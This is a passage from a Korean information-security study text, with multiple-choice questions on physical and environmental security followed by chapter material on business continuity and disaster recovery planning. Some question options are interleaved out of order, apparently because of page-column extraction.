311 23. 정보처리와 통신 서비스의 무결성과 가용성 을 보장하기 위하여 필요한 정보자원의 백업에 대한 물리적, 환경적 보안사항으로 부적합한 것 은? 1 백업 정보는 보안구역에 적용되는 기준과 일치하는 적절한 물리적, 환경적 보호가 이루어져야 한다. 2 재난이나 매체 오류 발생 시 모든 필수적인 업무정보와 소프트웨어가 복구될 수 있도록 적합한 백업설비를 제공해야 한다. 3 비상시에 사용할 수 있도록 백업 매체를 정기적으로 점검하고, 보안구역의 매체에 적용되는 통제항목을 백업 장소에서도 적용 되도록 확대해야 한다. 4 백업카피와 문서화된 복구절차의 정확하고 완 전한 기록과 함께 최소한의 백업 정보를 즉시 사용할 수 있도록 보안구역의 옆에 보관해야 한다. 24. 중요 업무처리 시설들을 물리적으로 안전한 보안구역에 위치시키는 목적은 무엇인가? 1 업무에 필요한 제반시설과 정보에 대한 무단 접근, 손상 방해로부터 보호하기 위함이다. 2 보안사고 및 오작동으로 인한 손해를 최소화 하고 보안 사고들을 감시하고 보안 사건들로 부터 향후 필요한 정보들을 얻기 위함이다 3 사람의 실수, 절도, 사기, 시설의 오용으로 부터 발생되는 보안 위험을 감소시키기 위함 이다 4 정보 자산이 적절한 수준의 보호를 받을 수 있게 하기 위함이다 26. 물리적 통제구역과 관련하여 고려사항으로 적합한 것은? 1 확실히 확인되고 인가된 직원들만 시스템과 데이터에 접근할 수 있어야 한다. 2 컴파일러, 에디터 및 기타 시스템 설비가 필요하지 않을 때는 운영시스템으로부터 접근 할 수 없도록 해야 한다 3 원격 장비 관리에 대한 절차 및 책임이 수립 되어야 한다. 4 보안구역의 모든 화재비상구에는 경보장치를 설치해야 하고, 즉시 차단 될 수 있도록 설계 해야 한다. 27. 물리적 출입통제 시 고려되어야 할 사항이 아닌 것은? 1 보안구역 방문자는 감독을 받아야 하며, 출입 일시를 기록해야 한다. 2 중요 정보와 정보처리설비에 대한 접근을 인가자만으로 제한되도록 통제해야 한다. 3 모든 직원들은 확인 가능한 신분증을 착용 해야 하며, 경호가 없는 외부인이나 신분증을 착용하지 않은 사람들을 눈여겨볼 필요가 있다. 4 중요 보안시설들은 물리적 출입을 효과적으로 통제하기 위하여 공용 출입카드의 사용이 요구된다. 28. 보안구역의 선택과 설계는 화재, 홍수, 폭발, 폭동, 그리고 다른 형태의 자연재해 또는 인재로 인한 피해가능성을 고려하는 것은 무엇에 관한 보안 사항인가? 25. 보안구역을 벽, 카드 통제 출입구 또는 유인 안내 데스크 등을 이용하여 업무에 필요한 제반 시설과 정보처리 시설들을 보호하는 것은 무엇을 말하는가? 1 사무실, 연구실 및 설비 보안 2 사용자 접근 관리 3 네트워크 접속 통제 4 보안 지역에서의 업무 1 자산의 분류 및 통제 2 물리적 보안 3 접근통제 4 인적 보호 311
312 29. 정보자산의 손상과 업무활동의 방해를 방지 하기 위하여 필요한 정보매체의 보안 사항이 아 닌 것은? 1 정보매체는 손상, 절도, 무단접근 등에 대비 하여 물리적으로 보호되어야 한다. 2 더 이상 필요가 없어서 조직으로부터 제거 하여 재사용하고자 하는 매체의 이전 내용은 완전히 삭제하고 확인해야 한다. 3 조직으로부터 제거되는 모든 매체에 대하여 인가가 요구되며, 감사추적의 편리성을 위하여 제거 조치된 매체는 즉시 기록에서 삭제한다. 4 모든 매체는 제조업자의 명세에 따라 안전 하고 위험이 없는 환경에서 보관해야 한다. 나 회의장소와 같은 곳에서 항상 사용할 수 있도 록 로근-온 상태를 유지하는 것이 필요하다. 32. 정보처리시설이 있는 건물의 전력공급이 원 활히 이루질수 있도록 모든 외부 통신선로에 설 치해야 하는 것은 무엇인가? 1 무정전 전원 공급 장치(Uninterruptable Power Supply) 2 콘딧(Conduit) 3 불시점검(Spot check) 4 낙뢰 보호필터(Lightning protection filter) 33. 케이블 보호에서 고려해야 할 사항이 아닌 것은? 30. 물리적 및 환경적 보안에서 사무실, 연구실 및 설비보안 선택의 경우에 고려사항으로 적절한 것은? 1 복사기와 팩스와 같은 지원기능은 보안 구역 외에 설치되어야 한다. 2 외부의 출입문과 접근 가능한 창문에 침입자 탐지시스템이 설치되어야 한다. 3 사용자의 편의 및 안전성을 위하여 통제구역 내에 사무용품이 보관되어 있어야 한다. 4 백업장비의 경우 주요 시스템과 최대한 가까운 거리에 있어야 한다. 1 전력 케이블과 통신 케이블은 전기적 간섭을 방지하기 위하여 분리해야 한다. 2 중요 시스템인 경우 대안 경로를 강구하고 광 섬유 케이블을 사용한다. 3 네트워크 케이블은 공공지역을 통과하는 경로 를 회피하는 등의 방법을 통해 인가되지 않은 가로채기나 손상으로부터 보호해야 한다. 4 정보처리설비로 연결되는 전력 및 통신선로는 가능하면 지상에 보호하여 설치한다. 34. 다음 중 허가없이 외부로 옮겨져서는 안되는 자산통제 항목으로 적합하지 않은 것은? 31. 재택근무나 조직의 외부 다른 지역에서 근 무를 할 때 사용되는 정보처리 장비들의 안전을 위하여 필요한 주의사항은 어느 것인가? 1 조직의 보안구역 밖에서 작업하는 위험을 감안하여 내부에서 사용되던 장비와는 동일한 목적에 대하여 다른 수준의 보안조치를 해야 한다. 2 보안구역 이외의 장소로 옮겨진 장비 및 매체는 도난의 위험을 방지하기 위하여 공공 장소에 맡겨야 한다. 3 이동용 컴퓨터는 항상 휴대물로 가지고 다녀야하며, 여행 시 필요한 경우 위장해야 한다. 4 노트북과 같은 이동 컴퓨터는 컨퍼런스 센터 1 소프트웨어 2 CD 3 케이블 4 개인용 컴퓨터 35. 비인가 된 자산의 이동을 방지하기 위해 개 인에게 수행되는 것은 무엇인가? 1 불시점검(Spot check) 2 방화벽(Firewall) 3 인증 통제 4 지침서 제공 312
313 36. 격리된 배달 및 하역장소에서의 보안 고려사 항으로 적절한 것은? 40. 정보처리설비를 보유한 건물이나 장소 주변 에 대한 물리적 보안대책이 아닌 것은? 1 특별한 경우는 접근이 인가된 배달요원 없이 건물의 다른 부서에서 공급 물품을 임의적 으로 유입할 수 있도록 한다. 2 배달 및 하역장소는 가능하다면 정보처리 설비와 따로 분리해야 한다. 3 하역되는 물건은 관리자에게 보고하고 즉시 반입해야 한다. 4 유입된 물품은 하역장소에서 사용위치로 바로 옮겨질 수 있도록 조치한다. 1 침입이 쉽게 이루어질 수 있는 틈이 없도록 보안구역의 외벽은 튼튼한 건축물이어야 한다. 2 외부로 연결되는 모든 통로는 무단 접근으로 부터 적절하게 보호해야 한다. 3 정보처리설비에 무단 접근할 수 없도록 네트 워크의 물리적인 중계기를 인증해야 한다. 4 접근을 통제하기 위한 차단물, 경보, 잠금장치 등이 사용될 수 있다. 37. 전기적 간섭으로 인한 손상을 방지하기 위하 여 서로 분리해야 하는 설비는 무엇인가? 1 네트워크 케이블과 광섬유 케이블 2 전력 케이블과 통신 케이블 3 통신 케이블과 네트워크 케이블 4 광섬유 케이블과 통신케이블 38. 업무의 지속적인 서비스를 위하여 필수적인 장비의 유지보수가 목표로 하는 정보보호 서비스 는 무엇인가? 1 무결성, 접근통제 2 가용성, 무결성 3 인증, 접근통제 4 접근통제, 가용성 39. 중요 업무의 정보처리설비는 보안구역에 설 치해야 하고, 제공된 보호조치는 확인된 위험에 상응해야 한다. 무단 접근의 위험이나 종이 및 매체와 정보처리설비의 손상을 감소시키기 위한 정책은 어느 분야의 통제사항에 속하는가? 1 관리적 보안 2 인사 보안 3 물리적 보안 4 기술적 보안 41. 배달 및 하역장소의 설정에 있어 고려사항으 로 적합하지 않은 것은 무엇인가? 1 건물 외부에서 하역장소로의 접근은 신원이 확인된 인가자로 제한해야 한다. 2 하역장소는 접근이 인가된 배달요원 없이도 건물의 다른 부서에서 공급물품을 편리하게 유입할 수 있도록 설계해야 한다. 3 하역장소의 내부출입문이 열려 있는 경우, 하역장소의 외부 출입문은 안전 조치를 취해야 한다. 4 유입된 물품들을 하역장소에서 사용위치로 옮 기기 전 잠재적인 위험이 있는지 검사해야 한 다. 42. 보안위협과 환경적인 유해요소로부터 물리적 으로 장비를 보호해야 하는 목적으로 가장 적절 한 것은? 1 자산의 손실, 피해 또는 손상 및 업무활동의 방해를 방지하기 위함. 2 조직들 간에 교환된 정보의 손실, 변경 또는 요용을 방지하기 위함. 3 정보에 대한 접근을 통제하기 위함. 4 권한이 없는 사용자의 접근을 방지하기 위함. 313
314 43. 특별히 보안을 필요로 하는 중요 정보를 처 리하는 장비 설치와 보호에 있어 적합하지 못한 것은 무엇인가? 1 장비는 작업환경에 불필요한 접근을 최소화 하도록 설치해야 한다. 2 중요 데이터를 처리하는 정보처리 및 저장 설비는 잘 보이는 곳에 설치해야 한다. 3 특별한 보호를 요구하는 항목들은 요구되는 일반적인 보호수준을 감소시키기 위하여 분리 해야 한다. 4 조직은 정보처리설비와 가까운 장소에서의 음식, 음주 및 흡연에 대한 정책을 수립해야 한다. 44. 장비 설치와 보호에 있어 물리적인 환경의 측면에서 잠재적인 위험요소가 아닌 것은 무엇인 가? 1 무단복제 2 절도 3 화재 4 흡연 가능한 높은 공중선로를 이용한다. 47. 다음 장비의 유지보수에 대한 설명중 적절하 지 못한 것은 무엇인가? 1 장비는 공급자가 권고하는 서비스 기간과 명세에 따라 유지 보수해야 한다. 2 결함이 의심되거나 또는 실제 발생한 결함, 그리고 모든 예방 및 유지 보수에 대한 기록 을 보관해야 한다. 3 유지보수를 위해 다른 장소로 장비를 이동하 는 경우에는 적절한 통제항목을 강구하고, 보 안정책에 의해 부여된 모든 요구사항들을 준수해야 한다. 4 장비의 수리와 서비스는 보안성을 위하여 소속부서의 직원이 수행해야 한다. 48. 정보처리를 위하여 보안구역 외에서 장비를 사용할 때에 필요한 고려사항으로 적절하지 못한 것은? 45. 전원 공급 이상이나 기타 전기관련 사고에 대하여 지속적인 전원 공급을 위한 방법으로 가 장 적합하지 못한 것은 무엇인가? 1 하나의 전원 이상에 대비한 다중 전력선 확보 2 전원 차폐기 설치 3 무정전 전원 공급 장치(UPS) 설치 4 보조 발전기 설치 1 장비보호를 위한 제조업자의 지시에 따라 항상 주의를 기울여야 한다. 2 재택근무 시 위험평가에 따라 통제항목을 결정하고 적절한 방법으로 조치해야 한다. 3 보안구역 외에서 장비를 사용할 때에는 장비 소유자의 허가를 받아야 한다. 4 보안구역 외에 있는 장비를 보호하기 위하여 적합한 보험 처리가 되어야 한다. 46. 데이터를 송수신하거나 정보서비스를 지원하 는 전력과 통신 케이블의 보호를 위한 고려사항 으로 적합하지 못한 것은 무엇인가? 1 네트워크 케이블은 콘딧(Conduit)을 이용하거 나 공공지역을 통과하는 경로를 회피하는 등 의 방법을 통해 인가되지 않은 가로채기나 손상으로부터 보호해야 한다. 2 전력 케이블과 통신 케이블은 전기적 간섭을 방지하기 위하여 분리해야 한다. 3 중요 시스템의 경우 광섬유 케이블을 사용 한다. 4 정보처리설리로 연결되는 전력 및 통신선로는 49. 장비의 안전한 폐기 또는 재사용의 방법으로 적절한 것은 무엇인가? 1 장비의 폐기는 업체에 위탁한다. 2 중요 데이터를 포함하고 있는 손상된 장치의 경우, 그 품목의 파기 및 복구 여부의 결정은 해당 직원이 결정한다. 3 중요 정보의 경우 삭제기능을 사용한다. 4 중요 정보의 저장 장치는 물리적으로 파기 되어야 한다. 314
315 50. 비인가 된 불법접근으로부터 기밀성을 보호 하기 위한 통제수단으로 적절하지 못한 것은 무 엇인가? 53. 불의의 화재에 대비하여 자동 화재경보기를 설치할 때 고려사항으로 적절하지 못한 것은 무 엇인가? 1 직원들은 책상 위에 문서나 제거할 수 있는 저장 매체를 남겨놓지 않아야 한다. 2 자리를 비울 경우 반드시 네트워크 접속을 차단하고 시스템을 격리시킨다. 3 사무실이 비어있거나 사용 중이 아닌 경우에 는 중요한 업무정보를 방화금고나 서류함에 보관 한다. 4 송수신 우편물의 장소와 관리자가 없는 팩스나 텔렉스 장비를 보호한다. 51. 장비 및 소프트웨어 정보자산의 유출 및 유 입의 주의사항중 적절하지 못한 것은 무엇인가? 1 자산은 허가 없이 외부로 옮겨져서는 안된다. 2 외부 유출 및 유입될 경우 그 사실을 기록한다. 3 비인가 된 자산의 이동을 검사하는 임의 추출 조사 또는 불시점검(Spot Check)이 수행되어 야 한다. 4 직원들은 불시점검이 있다는 것을 몰라야 한다. 52. 장비를 보유한 건물에 대한 화재 안전진단이 중요하다. 화재위험에 대한 고려사항으로 적절하 지 못한 것은 무엇인가? 1 전형적인 점화원인은 전기기구와 누전, 부주 의하게 버려진 담배, 자연발화 되기 쉬운 물 질의 부적절한 보관, 부주의한 난방 기구의 사용 그리고 방화 등이 있다. 2 화재가 발생할 경우 불길이 커지는 정도는 건 물의 연소될 만한 물질의 양에 달려있다. 화재가 커지는 경우는 휴대용 소화기로 소화 할 수 있도록 설계해야 한다. 3 건물은 화재는 자동 스프링클러 시스템 또는 할론 방전 시스템 등에 의해 자동적으로 소화 될 수 있는 대책이 필요하다. 4 잠재적인 점화 원인들의 평균 이상의 수치는 화재 가능성을 높인다. 예를 들어, 화학물질 저장소는 평균 이상의 화재연료를 보유하고 있다. 1 화재경보기의 위치 및 공간 2 화재경보기의 통제 현황판 설치 3 경보의 전달체계 4 잘 알려진 업체 제품 선정 54. 소화설비의 설명중 적절하지 못한 것은 무엇 인가? 1 휴대용 소화기: 화재가 확산되었을 경우 진압 용으로 효과적인 방법이다. 2 호스: 전문적인 소방원들이 물로 소방할 때 사용한다. 3 자동 스프링클러: 실내 상부의 온도가 약 섭씨 72도에 이르면 자동으로 물이 뿜어져 나와 소화되도록 한다. 4 전체적인 소화시스템: 화공약품인 할로겐 등 의 가스를 실내에 채워서 연소 작용을 방지 하는 방법이다. 55. 누수 및 낙수 발생은 전산기기에 심각한 장 애를 유발할 수 있다. 다음 설명 중 누수 발생의 원인으로 적절하지 못한 것은 무엇인가? 1 건물의 외벽이나 지붕이 장시간 사용되어 방수 및 배수 성능 저하. 2 배수 능력을 초과하는 호우의 경우. 3 자동 순환 펌프 배수기를 높은 곳에 설치하지 않은 경우. 4 배수구가 쓰레기 등으로 막혔을 경우. 56. 지속적인 전원 공급을 위하여 필요한 방법은 무엇인가? 1 무정전 전원공급 장치(UPS) 2 건물 상단에 낙뢰필터 및 보호설비를 설치 3 광 케이블을 사용하여 전원공급 4 콘딧(Conduit)의 설치 315
316 57. 업무처리의 지속성을 보장하기 위하여 장비 의 유지 보수 시 고려해야 할 주요 정보보호 서 비스는 무엇인가? 60. 정보처리 설비를 보유한 건물을 물리적으로 안전하게 보호할 수 있는 방법이나 장치가 아닌 것은? 1 인증 2 부인봉쇄 3 접근통제 4 무결성 58. 깨끗한 책상정리와 컴퓨터 화면 정책에 관련 된 지침사항으로 적절한 것은? 1 사용자 소재지의 장비를 포함한 원거리 장비 의 관리에 대한 책임과 절차가 수립되어야 한다. 2 전력선은 전기적 간섭을 방지하기 위해 통신선과 분리되어야 한다. 3 송수신 우편물의 장소와 관리자가 없는 팩스 나 텔렉스 장비를 보호해야 한다. 4 전자우편의 사용금지가 필요한 경우에 대한 지침이 있어야 한다. 59. 중요 정보처리설비를 이용하는 직원들이 사 무실 근무에서 유의해야 하는 사항으로 적합한 것은 다음 중 어느 항목인가? 1 업무의 지속성을 보장하기 위하여 컴퓨터 화면에 최종 수행된 정보처리에 관한 사항을 남겨두어 다음번의 이용에 대비한다. 2 조직에게 중요하고 보안으로 분류된 정보를 공용 프린터에서 인쇄할 경우는 인쇄 즉시 프린터에서 수거하도록 가까운 위치의 직원에게 알려야 한다. 3 책상 위에 남겨진 정보자산은 화재, 홍수, 폭발 등의 재난에 의해서도 손상되거나 파괴 될 수 있으므로 항상 정리한다. 4 근무시간 종료 이후에는 복사기를 편리하게 사용할 수 있도록 사무실 내에 설치해야 한다. 1 침입차단 통제 메커니즘 2 경보장치 3 잠금장치 4 무정전 전원공급 장치(UPS) 61. 다음 항목 중 무단 접근을 방지하기 위하여 가능하다면 정보처리설비와 따로 분리하여 통제 해야 하는 것은? 1 사무실, 연구실 및 설비보안 2 보안구역에서의 작업 3 배달 및 하역 장소 4 물리적인 통제구역 62. 보안구역을 방문하는 외부 사용자에게 부여 되는 통제 사항이 아닌 것은? 1 보안구역의 통제 요구사항과 비상시 절차에 대한 지시를 받아야 한다. 2 모든 접근을 인가하고 확인하기 위해 신원 확인 통제항목 즉, 개인 확인번호가 부여된 출입카드의 사용이 요구된다. 3 방문자는 확인 가능한 신분증을 착용해야 하며, 경호가 없는 외부인이나 신분증을 착용 하지 않은 사람들을 눈여겨볼 필요가 있다. 4 제3의 사용자들은 조직의 보안정책과 정보 처리설비의 정확한 사용뿐만 아니라 보안 요구사항, 법적인 책임, 업무 통제항목 등을 숙지해야 한다. 316
317 63. 사무실이나 연구실의 설비와 정보들을 보호 하기 위한 고려사항으로 부적합한 것은? 1 사람이 없을 때는 출입문이나 창문이 잠겨져 있어야 하며, 특히 1층일 경우, 창문에 대한 외부의 보호 장치를 고려해야 한다. 2 모든 외부의 출입문과 접근 가능한 창문에 적합한 침입자 탐지시스템을 전문적 표준에 따라 설치하고 정기적으로 점검해야 한다. 3 무인구역은 항상 경보가 작동되어야 하며, 컴퓨터실이나 통신실과 같은 장소에도 보안 설치가 제공되어야 한다. 4 유해성, 가연성 물질은 보안구역으로부터 안전한 거리를 두고 보관하고, 사무용품과 같은 공급 물품들은 즉시 사용할 수 있도록 구역내에 보관한다. 64. 인가되지 않은 접근의 기회를 감소시키고 보 안장비의 안전을 위하여 환경적인 측면에서 고려 해야 하는 장비의 설치 요구사항이 아닌 것은? 65. 주요 정보처리설비가 운영되는 장비실의 전 력중단 위험에 대비하여 필요한 조치가 아닌 것 은? 1 정보처리가 계속되어야 하는데 전원공급 중단이 계속된다면 백업 발전기를 고려해야 한다. 2 제조업자의 지시에 따라 정기적으로 발전기를 시험하고, 적절한 연료공급이 지원되는지 검사한다. 3 비상시에 신속한 전원차단이 가능하도록 장비실의 비상출구 근처에 비상 전원스위치를 설치해야 하고, 비상등도 전력중단에 대비 하여 설치해야 한다. 4 모든 건물에 낙뢰보호 장치를 적용하고, 외부 통신선로는 전자파 방사가 적고 도청이 어려운 광섬유로 연결한다. 66. 퇴사 인터뷰는 직원들에게 무엇을 재고시키 기에 좋은 시간인가? 1 주변 환경의 진동, 화학적 또는 전자기파 등 의 영향을 고려하여 설치한다. 2 키보드 덮개와 같은 특별 보호수단이 업무 환경의 장비보호를 위하여 고려되어야 한다. 3 제3자가 불법적으로 접근할 수 있는 환경적 위험요소를 방지하기 위하여 사용자의 감시가 쉬운 사무실에 설치해야 한다. 4 옆 건물의 화재, 천장이나 바닥에서의 누수, 또는 거리에서의 폭발 등과 같이 구내 근처 에서 발생할 수 있는 재난의 영향 또한 고려 해야 한다. 1 연봉 또는 상여금 처리 2 회사 보안 정책 3 직업에 참고사항 조사 4 기밀 유지 계약 사항 67. 다음 중 어떤 방법이 직원 개인의 자가 교육 훈련 역량을 증가 시키는 데 유용한가? 1 공식 외부 교육훈련 2 실무 교육훈련 3 컴퓨터 기반 교육훈련 4 내부 교육훈련 68. 다음 중 직원의 보안 의식수준을 향상 시킬 수 있는 가장 효과적인 방법은? 1 실제 보안 침해 사례 2 동료의 예 3 비디오 4 그림 317
318 69. 다음 중 언제 직원에 대한 심사 및 검증이 수행되어야 하는가? 1 채용 공고를 보고 입사 지원 했을 때. 2 채용 후 1주일 후에 3 면접 시험 때 4 채용시점에 70. 조직의 사업 목적 달성을 위해 가장 중요한 핵심 자산은 무엇인가? 1 IT 시스템 3 시간 2 자본 4 인적자원 71. 보안 통제 항목을 정의하는 필요한 순서는 무엇인가? I. 실패 또는 침해를 방지하고 탐지하고 대응하기 위한 요구사항의 정의 II. 해당 이슈가 어떻게 위험에 노출될 수 있는 지를 식별 III. 방지, 탐지 대응에 도움이 될만한 추가적인 통제 항목을 생성 IV. 실패 또는 위험에 노출됨으로써 발생하는 영향 파악 V. 반드시 다루어져야 할 시스템 또는 이슈의 식별 1 I, IV, V, II, 및 III 3 V, II, I, III, 및 IV 2 I, III, IV, V, 및 II 4 V, II, IV, I, 및 III 318
319 제 7장. 업무 지속성과 재난 복구 제 1절. 업무 지속성 계획 chapter 1. 업무 지속성 계획 개요 chapter 2. 업무 지속성 계획 관리 제 2절. 재난 복구 계획 chapter 1. 재난 복구 계획 개요 chapter 2. 재난 복구 대책 제 3절. 업무 지속성과 재난 복구 문제 풀이 chapter 1. 종합 문제 319
320 제 1절. 업무 지속성 계획 현대 기업의 모든 업무는 전산화되어있고 이로 인해 잠시라도 시스템이 정지되는 상황이 발생된다면 기업뿐만 아니라 나아가 국가적으로도 대단한 손실이 아닐 수 없다. 우리는 앞장에서 시스템 자체 결 함 또는 해킹 등으로 인한 시스템의 가용성이 위협받는 경우를 많이 다뤄 왔다. 그러나 현대의 전산시 스템관리에서 고려하지 않으면 안 될 것이 바로 업무지속성 계획(BCP: Business Continuity Planning) 과 재난복구 계획(DRP: Disaster Recovery Planning)이다. BCP와 DRP는 주로 인재 또는 천재지변으로부터도 시스템을 보호하여 가용성(Availability)을 높이고 업 무 환경의 계속성을 유지하며 나아가서 기업의 대외신인도 향상과 서비스의 질적 수준을 높이는데 그 목적이 있다. 가. 업무지속성 계획 정의 chapter 1. 업무지속성 계획 개요 업무지속성 계획은 각종 재해나 재난의 발생을 대비하여 핵심 시스템의 가용성과 신뢰성을 회복하고 업무의 연속성을 유지하기 위한 일련의 업무지속성 계획과 절차를 말한다. 업무지속성 계획은 단순한 데이터의 복구나 원상회복뿐만 아니라 업무 지속성을 보장하고 그로 인한 조직의 신뢰도를 유지하고 나아가 전체적인 신뢰성 유지와 가치를 최대화하는 방법이다. 나. 업무지속성 계획 범위 업무지속성 계획 범위는 조직의 특성 및 요구사항에 따라 결정된다. 예를 들어 조직은 조직 내 핵심 업무 프로세스와 가장 큰 위험을 중점으로 하여 분석한 후, 핵심 프로세스 중에서 가장 취약한 부분에 집중하는 식으로 범위를 축소할 수 있다. o 업무지속성 계획 범위 결정 요인 - 대상 업무 프로세스 - 주요 구성 요소(정보, 시스템, 직원) - 해당 위험 다. 업무지속성 계획과 재난복구 계획 간의 관계 재난복구 계획은 업무지속성 계획과 달리 위험 감소나 가용성 관리와 같은 전산 환경 업무 전반에 걸 쳐진 이슈에 대해 다루고 있지 않으며 단지 재난 및 재해 복구에 치중되어 있다. 따라서 범위 측면에 서 재난복구 계획은 업무지속성 계획의 일부분에 포함될 수 있다. 즉, 업무지속성 계획의 관리는 전산 환경 업무 전반에 걸쳐 이루어지므로, 재난복구 계획보다 관리 범 위가 전체적이고 포괄적이다. 320
321 chapter 2. 업무지속성 계획 관리 가. 업무지속성 계획 관리 개요 업무지속성 계획은 단순한 일회성 프로젝트가 아니라, 조직 경영과 기술 환경의 변화를 즉각적으로 반 영할 수 있는 일련의 관리 프로세스를 말한다. 따라서 업무지속성 계획 관리를 위해서는 관련 팀의 구 성, 조직의 중요 업무 프로세스 파악, 업무 영향 평가, 위험 분석 등의 다양한 업무 수행이 필요하다. 나. 업무지속성 계획 관리 단계 (1) 개시 단계 업무지속성 관리에 관한 정책 수립 단계로 업무지속성 관리의 범위 구체화하고 업무지속성 관리를 위 한 제반 사항(인적, 물적 자원)을 준비한다. (2) 전략 수립 단계 업무 영향 분석 및 위험 평가, 위험 감소 등의 여러 요소를 파악한 후 업무지속성 관리를 위한 효율적 인 전략을 수립하는 단계이다. 전략 수립 단계는 크게 다음 프로세스로 구성된다. o 업무영향평가(BIA)- 조직 내 업무 프로세스 파악, 잠재적인 위험과 영향 분석, 업무복구 목표의 정의 등 o 위험평가 - 자산, 취약성, 위협의 식별 및 분석을 통한 위험 평가 o 업무지속성 전략 수립- 위험 감소 대책 파악 및 평가 등의 전략 정의 다음 [표 7-1]은 업무지속성 계획 수립 시 고려야해야 할 핵심 요소이다. 321
322 (3) 구현 단계 업무지속성 관리를 위한 프로그램을 수립하는 단계로 전략 수립 단계에서 수립한 위험 감소 조치 및 설비 등을 구현하고, 필요한 계획 및 절차를 수립하며, 초기 시험을 수행하는 단계이다. (4) 운영 관리 단계 업무지속성 전략 및 절차 등을 계속적으로 시험, 검토, 유지 보수하는 단계로, 교육 및 훈련 절차가 포 함된다. 322
323 제 2절. 재난 복구 계획 chapter 1. 재난복구 계획 개요 가. 재난 개요 (1) 재난의 정의 정보시스템의 재난에 대한 개념을 NIST에서는 컴퓨터 운영 붕괴로 조직의 정상적 기능이 파괴되는 비 상사태 라고 정의했으며, Owen은 생명, 재산, 자산, 그리고 정상적인 운영 능력에 대한 위험 이라고 정의했다. 즉, 재난이란 정보시스템 자산에 대해 위협이 매우 파괴적인 경우 그 결과로써 발생하는 손 실을 말한다. (2) 재난의 분류 o 인간 오류에 의한 재난 o 의도적인 재난 o 자연 재난 (3) 재난의 수준 o 수준 I - 한 장소에서만 발생되었고 내부자원에 의해 처리될 수 있다. 정상적인 업무에 영향이 적은 것으로 작은 수재, 건물 내 부분적인 정전, 설비 고장 등에 의한 사건이 이에 해당된다. o 수준 II - 여러 장소에서 발생되었고 내부자원에 의해 처리될 수 있다. 일시적으로 정상적인 업무에 영향을 끼치는 것으로 화재, 작은 지진, 특정 지역의 정전 등에 의한 사건이 이에 해당한다. o 수준 III - 지역적인 재난에 의해 발생된 것으로 외부 도움 및 지원이 있어야 복구가 가능하다. 정상 적인 업무가 며칠 또는 수 주일이 걸릴 수 있는 것으로 큰 지진, 홍수, 태풍 등에 의해 발생한 사건이 이에 해당한다. 나. 재난복구 계획 정의 재난복구 계획이란 때로 업무지속성 계획(BCP)라고도 불리며, 한 조직이 잠재적인 재난에 대해 어떻게 대처할 것인지를 기술한 내용을 일컫는다. 여기서 재난이란 정상적인 기능의 수행이 불가능하게 만드 는 사건(지진, 해일, 태풍, 폭발 등)을 말하며, 재난복구 계획이란 재난의 피해를 최소화하고 그 조직이 중요 기능을 그대로 유지하거나 또는 신속히 재개할 수 있도록 취해진 예방조치들로 구성된다. 업무지속성 계획은 중요한 업무의 기능들을 비상시에 대비하여 자산의 우선순위를 평가한다거나 대체 장소를 선택하는 등 재해나 재난 시에 원상 복귀하고자 미리 평가 계획하는 단계인 반면에 재난복구 계획은 실제 재해나 재난이 발생동안 그리고 재해 발생 후에 조직원들이 취해야 하는 절차나 계획 등 을 말한다. 특히 재난복구 계획에서는 복구 절차를 포함한다는 점이 업무지속성 계획과의 큰 차이라고 할 수 있다. 다. 재난복구 계획 주요 목적 재난복구 계획은 실시간에 정보보호(정보의 기밀성, 무결성, 가용성)를 확보하는 것으로, 재난 발생시 준비된 대체 장소에서 기업의 시스템을 운영하고, 재해 완료 시 기업의 원래 장소로 옮겨와 정상적인 업무처리를 하는 것이다. 323
324 라. 재난복구 계획 영역 Jackson은 재난복구 계획의 영역을 크게 자료처리, 음성 및 자료통신, 최종 사용자, 주요시설, 부대시설 5가지로 구분하였으며, Corby는 크게 하드웨어, 운영체제, 응용소프트웨어, 통신, 사람, 공급품, 보고서 및 문서, 자료처리 및 사무실 시설 등의 8가지로 구분하였다. 마. 재난복구 계획 주요 요소 Owen은 재난복구 계획의 주요 요소를 다음 5 가지로 정의했다. o 위험 관리자는 최악의 시나리오에 대한 계획을 세우고 이에 대한 훈련을 해야 한다. o 재난 발생 즉시 생명, 재산, 자산 등을 보호하기 위한 자원을 신속히 조달할 수 있는 긴급 대책을 마련하여야 한다. o 업무 재개를 위한 업무지속성 계획을 마련해야 한다. o 보험 또는 재난복구서비스 공급업자에 의해서 재난에 의해 영향을 받은 정보시스템을 수리하고 교체하고 재건하는 과정인 복구는 필수적이다. o 재난 발생 이전의 상태와 마찬가지로 조직 내 모든 자원이 활용되는 정상적인 운영의 재개이다. chapter 2. 재난복구 대책 가. 재난복구 대책 변화 (1) 1960 년대 조직 내 일부 관리자만이 컴퓨터를 사용함으로써 재난복구 계획의 필요성이 그리 강조되지 않았으며 단순히 메인프레임 복구가 주 고려 대상이었다. 그 당시 대부분의 재난은 화재, 태풍 등의 자연 재해가 주원인이었다. (2) 1970 년대 데이터 가용성 확보를 위해 데이터 백업에 대한 인식이 확산되었다. (3) 1980 년대 조직 내 전산센터에 대한 재난복구 계획에 대한 인식이 확산되어 재난복구 계획과 관련된 도구가 나타 났다. (4) 1990 년대 정보기술과 네트워크 통신 기술의 발달로 인해, 분산 시스템 환경으로 변화하고 모든 사용자가 자신의 컴퓨터에서 자산에 대한 접근, 이용이 가능하면서, 정보시스템에 대한 조직의 의존도가 높아졌다. 그리 고 지속적인 업무지속성은 조직의 생존과 경쟁에 중요한 요소로 자리 잡으면서 재난복구 대책은 이제 조직 관리에서 반드시 필요한 것으로 인식된다. 나. 재난복구 대책 전략 재난복구를 위한 대안 혹은 전략에 대해서는 영국의 CCTA(Central Computer and Telecommunications Agency)(1990)에서는 9가지를 제시하고 있다. o 무대책(Do nothing) : 과다한 비용 부담 때문에 비상사태에 대한 대책을 전혀 마련하지 않는 것이다. 극히 영세한 규모의 조직에서는 고려해 볼 수 있으나 대부분의 조직에서는 해당되지 않는 대안이라고 할 수 있다. 324
